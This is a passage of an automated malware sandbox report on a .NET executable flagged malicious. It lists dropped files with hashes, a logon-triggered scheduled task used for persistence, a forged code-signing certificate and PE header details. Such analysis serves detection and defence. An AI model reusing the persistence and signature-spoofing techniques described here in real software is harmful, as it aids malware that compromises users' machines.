                                                                                                                  Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1575
                                                                                                                  Entropy (8bit):5.107638367564107
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaBxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTEv
                                                                                                                  MD5:A7B598B4DB64F3A7260E80D9A07B15C0
                                                                                                                  SHA1:C980C8EE375DD735E29E8BCAC06912A68277F4D1
                                                                                                                  SHA-256:52C1B5686912FECD3CB3FA39B908F9C4690B5807578BA18420DFFB709F299695
                                                                                                                  SHA-512:4D1143C4B2C96972B35B0E00562FC286BD371170501BC1B01BCDBAC76C1A3DC2C871D4A641A5B9A6A346A6CED96DBD0BE5BBB39DB77FF1B302F1119093799C63
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                  Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1575
                                                                                                                  Entropy (8bit):5.107638367564107
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaBxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTEv
                                                                                                                  MD5:A7B598B4DB64F3A7260E80D9A07B15C0
                                                                                                                  SHA1:C980C8EE375DD735E29E8BCAC06912A68277F4D1
                                                                                                                  SHA-256:52C1B5686912FECD3CB3FA39B908F9C4690B5807578BA18420DFFB709F299695
                                                                                                                  SHA-512:4D1143C4B2C96972B35B0E00562FC286BD371170501BC1B01BCDBAC76C1A3DC2C871D4A641A5B9A6A346A6CED96DBD0BE5BBB39DB77FF1B302F1119093799C63
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                  Process:C:\Users\user\AppData\Roaming\GedTanqRR.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1575
                                                                                                                  Entropy (8bit):5.107638367564107
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaBxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTEv
                                                                                                                  MD5:A7B598B4DB64F3A7260E80D9A07B15C0
                                                                                                                  SHA1:C980C8EE375DD735E29E8BCAC06912A68277F4D1
                                                                                                                  SHA-256:52C1B5686912FECD3CB3FA39B908F9C4690B5807578BA18420DFFB709F299695
                                                                                                                  SHA-512:4D1143C4B2C96972B35B0E00562FC286BD371170501BC1B01BCDBAC76C1A3DC2C871D4A641A5B9A6A346A6CED96DBD0BE5BBB39DB77FF1B302F1119093799C63
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                  Process:C:\Users\user\Desktop\s2Jg1MAahY.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1575
                                                                                                                  Entropy (8bit):5.107638367564107
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaBxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTEv
                                                                                                                  MD5:A7B598B4DB64F3A7260E80D9A07B15C0
                                                                                                                  SHA1:C980C8EE375DD735E29E8BCAC06912A68277F4D1
                                                                                                                  SHA-256:52C1B5686912FECD3CB3FA39B908F9C4690B5807578BA18420DFFB709F299695
                                                                                                                  SHA-512:4D1143C4B2C96972B35B0E00562FC286BD371170501BC1B01BCDBAC76C1A3DC2C871D4A641A5B9A6A346A6CED96DBD0BE5BBB39DB77FF1B302F1119093799C63
                                                                                                                  Malicious:true
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                  Process:C:\Users\user\Desktop\s2Jg1MAahY.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):837640
                                                                                                                  Entropy (8bit):7.643893733961534
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:3t8f2uE1zDXy/kp5qw8+KBAswiwJLcPwwuEco5IrU1GQGibDVy1ICS75Al/k/8fI:3tu2uOa/8q7FeswigQ/ar0PVy1pk/u2B
                                                                                                                  MD5:6239C4047E0F1C4F55A96199E77D3669
                                                                                                                  SHA1:7967D09A6357DFB6ABBD99963DBCF9EE46B50BD9
                                                                                                                  SHA-256:130C869F7CE90B4DD45A1192C8CB13AA8E3F986AB29FB9F446475E2030A2D2EC
                                                                                                                  SHA-512:BA9BE27965A41188431B55DFE7FEC6EB60D61F2A96B269C4D9F667C9E6D9E8E140A6457904B5798D4D75C985DF37975C8096DD91F2512CB71A220D2FB5D184BD
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q.ag..............0..^...2.......}... ........@.. ....................................@.................................`}..O.......L/...............6........................................................... ............... ..H............text....]... ...^.................. ..`.rsrc...L/.......0...`..............@..@.reloc..............................@..B.................}......H.......XX..(.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*r.(......(......(......(....*.0..Y........(.....(.....{...........%.r...p(....s.....%.r...p(....s.....%.r!..p(....s........(....&*....0..j..........{....o....(....%.}.....}.....{....rg..p.|....(....rq..p(....o.....{....rg..p.|....(....rq..p(....o....*...0..]........{....o....(.....#......@.Y.#3333...@.#.......@ZX#.p=...?Y.(......{......(....o...
                                                                                                                  Process:C:\Users\user\Desktop\s2Jg1MAahY.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):26
                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                  Malicious:true
                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                  Process:C:\Users\user\Desktop\s2Jg1MAahY.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):837640
                                                                                                                  Entropy (8bit):7.643893733961534
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:3t8f2uE1zDXy/kp5qw8+KBAswiwJLcPwwuEco5IrU1GQGibDVy1ICS75Al/k/8fI:3tu2uOa/8q7FeswigQ/ar0PVy1pk/u2B
                                                                                                                  MD5:6239C4047E0F1C4F55A96199E77D3669
                                                                                                                  SHA1:7967D09A6357DFB6ABBD99963DBCF9EE46B50BD9
                                                                                                                  SHA-256:130C869F7CE90B4DD45A1192C8CB13AA8E3F986AB29FB9F446475E2030A2D2EC
                                                                                                                  SHA-512:BA9BE27965A41188431B55DFE7FEC6EB60D61F2A96B269C4D9F667C9E6D9E8E140A6457904B5798D4D75C985DF37975C8096DD91F2512CB71A220D2FB5D184BD
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q.ag..............0..^...2.......}... ........@.. ....................................@.................................`}..O.......L/...............6........................................................... ............... ..H............text....]... ...^.................. ..`.rsrc...L/.......0...`..............@..@.reloc..............................@..B.................}......H.......XX..(.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*r.(......(......(......(....*.0..Y........(.....(.....{...........%.r...p(....s.....%.r...p(....s.....%.r!..p(....s........(....&*....0..j..........{....o....(....%.}.....}.....{....rg..p.|....(....rq..p(....o.....{....rg..p.|....(....rq..p(....o....*...0..]........{....o....(.....#......@.Y.#3333...@.#.......@ZX#.p=...?Y.(......{......(....o...
                                                                                                                  Process:C:\Users\user\Desktop\s2Jg1MAahY.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):26
                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                  Malicious:true
                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Entropy (8bit):7.643893733961534
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:s2Jg1MAahY.exe
                                                                                                                  File size:837'640 bytes
                                                                                                                  MD5:6239c4047e0f1c4f55a96199e77d3669
                                                                                                                  SHA1:7967d09a6357dfb6abbd99963dbcf9ee46b50bd9
                                                                                                                  SHA256:130c869f7ce90b4dd45a1192c8cb13aa8e3f986ab29fb9f446475e2030a2d2ec
                                                                                                                  SHA512:ba9be27965a41188431b55dfe7fec6eb60d61f2a96b269c4d9f667c9e6d9e8e140a6457904b5798d4d75c985df37975c8096dd91f2512cb71a220d2fb5d184bd
                                                                                                                  SSDEEP:12288:3t8f2uE1zDXy/kp5qw8+KBAswiwJLcPwwuEco5IrU1GQGibDVy1ICS75Al/k/8fI:3tu2uOa/8q7FeswigQ/ar0PVy1pk/u2B
                                                                                                                  TLSH:A605CFC03B3A7701DEBC7934D176EDB862642E687000B9E76EDD2B4776D9202A91CF64
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q.ag..............0..^...2.......}... ........@.. ....................................@................................
                                                                                                                  Icon Hash:674d797961216d59
                                                                                                                  Entrypoint:0x4c7db2
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:true
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x6761E651 [Tue Dec 17 21:00:01 2024 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                  Signature Valid:false
                                                                                                                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                  Error Number:-2146869232
                                                                                                                  Not Before, Not After
                                                                                                                  • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                                                  Subject Chain
                                                                                                                  • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                  Version:3
                                                                                                                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                  Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                                  Instruction
                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                  dec esp
                                                                                                                  add byte ptr [edi+00h], ch
                                                                                                                  popad
                                                                                                                  add byte ptr [eax+eax+00h], ah
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc7d600x4f.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x2f4c.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xc92000x3608
